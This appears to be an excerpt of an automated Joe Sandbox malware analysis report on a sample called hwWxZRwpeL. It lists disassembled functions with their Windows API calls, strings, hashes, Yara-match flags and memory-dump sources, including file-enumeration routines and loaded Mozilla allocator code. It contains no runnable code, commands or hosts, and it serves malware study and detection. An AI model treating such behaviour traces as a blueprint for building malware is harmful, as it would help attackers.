                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3040639385-4173974723
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0110062b842894c3054e034e9764891d6d5c42babbe61045ede0836c689ce1a1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ee184e266e5a633bb6b8285f9655a7a36ec9a2c6b824ebc70682003e8ed1328d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0110062b842894c3054e034e9764891d6d5c42babbe61045ede0836c689ce1a1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32539F71A097018FC704CF2DC580615FBE1BF8A329F29C66DE86A9BB91D771E841CB85
                                                                                                                                                                                                                                                                                                                                  Function 6C6334A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633527
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63355B
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6335BC
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6335E0
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63363A
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633693
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6336CD
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633703
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63373C
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633775
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63378F
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633892
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6338BB
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633902
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633939
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633970
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6339EF
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633A26
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633AE5
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633E85
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633EBA
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C633EE2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6361DD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C63622C
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6340F9
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63412F
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C634157
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C636250
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C636292
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C63441B
                                                                                                                                                                                                                                                                                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C634448
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C63484E
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C634863
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C634878
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C634896
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C63489F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: floor$free$malloc$memcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3842999660-3916222277
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7c779dac480657b61ee80bffdef7da0ac84d77fe5fe14804dd9622b130562c92
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ca07b900b94d151ac8b36b786330af89ac69a530e645b770ee4edcab2a2f014
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c779dac480657b61ee80bffdef7da0ac84d77fe5fe14804dd9622b130562c92
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ECF24D74908780CFC725CF29C08469AFBF1FF8A318F119A5ED98997711DB729886CB46
                                                                                                                                                                                                                                                                                                                                  Function 6C5E64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5E64DF
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5E64F2
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C5E6505
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C5E6518
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C5E652B
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C5E671C
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C5E6724
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5E672F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C5E6759
                                                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C5E6764
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C5E6A80
                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C5E6ABE
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E6AD3
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5E6AE8
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5E6AF7
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3287ef0bfc511b62b00645a123dacb1e129d7f0869cecde30c2fa86dd2ecd323
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a6936e4d8cb3ca31897ef3904865142b16ceaff693a3e30c1573fef4d843559
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3287ef0bfc511b62b00645a123dacb1e129d7f0869cecde30c2fa86dd2ecd323
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CF1E170A0532D9FCB20CF25CC88B9AB7B5AF4A358F144299D909E3641DB31AA85CF95
                                                                                                                                                                                                                                                                                                                                  Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00413B1C
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1125553467-4052298153
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 688ec11647c5d6e5c8bde466c476daebff219a7ccbb835dca2844c0648a756ac
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 688ec11647c5d6e5c8bde466c476daebff219a7ccbb835dca2844c0648a756ac
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                                                                                                                                                                                                                                                                                                                  Function 6C63C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63C5F9
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63C6FB
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C63C74D
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C63C7DE
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C63C9D5
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63CC76
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C63CD7A
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63DB40
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C63DB62
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C63DB99
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63DD8B
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C63DE95
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C63E360
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C63E432
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C63E472
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: afca64c4bdea6fc73b57fb5fb823ed0553cb6b6917037302d1d58f0eec1ebd43
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD33CF71E0022ACFCB04CFA8C8806EDBBF2FF49314F189269D959AB755D731A945CB94
                                                                                                                                                                                                                                                                                                                                  Function 6C5FED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C5FEE7A
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C5FEFB5
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C601695
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6016B4
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C601770
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C601A3E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                                                                  • String ID: ~q]l$~q]l
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3693777188-572885207
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5c30f5ec3e0e31607ad2905df51b0f446b009c4263dd9b69b54ec58948e2eda1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 490b7f4ec8ef2344de215da5526bf77e589b21f5abc4291a017a689732cb0b22
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c30f5ec3e0e31607ad2905df51b0f446b009c4263dd9b69b54ec58948e2eda1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50B32971E002198FCB18CFA8C990A9DB7B2BF49308F1582A9D559BB745D730AD86CF94
                                                                                                                                                                                                                                                                                                                                  Function 6C5EFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E7B8), ref: 6C5EFF81
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E7B8), ref: 6C5F022D
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C5F0240
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E768), ref: 6C5F025B
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E768), ref: 6C5F027B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                                                                                                  • API String ID: 618468079-3577267516
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e4b8aed1b2c8ba6589150c7769a132b10113f4e096c4e4c4f7513a6046e24a51
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ca15ead7abdd591184ef5524d835f91c69616188835377c7c7add84086b4d2d2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b8aed1b2c8ba6589150c7769a132b10113f4e096c4e4c4f7513a6046e24a51
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1C28C71A057418FD718CF29C980716BBE1AFC5328F28CA6DE4B98B795D771E802CB85
                                                                                                                                                                                                                                                                                                                                  Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004147F6
                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 004148F0
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0079D4F8,?,00000104), ref: 00414915
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0C10), ref: 00414928
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00414935
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00414946
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                                                                                  • API String ID: 13328894-2848263008
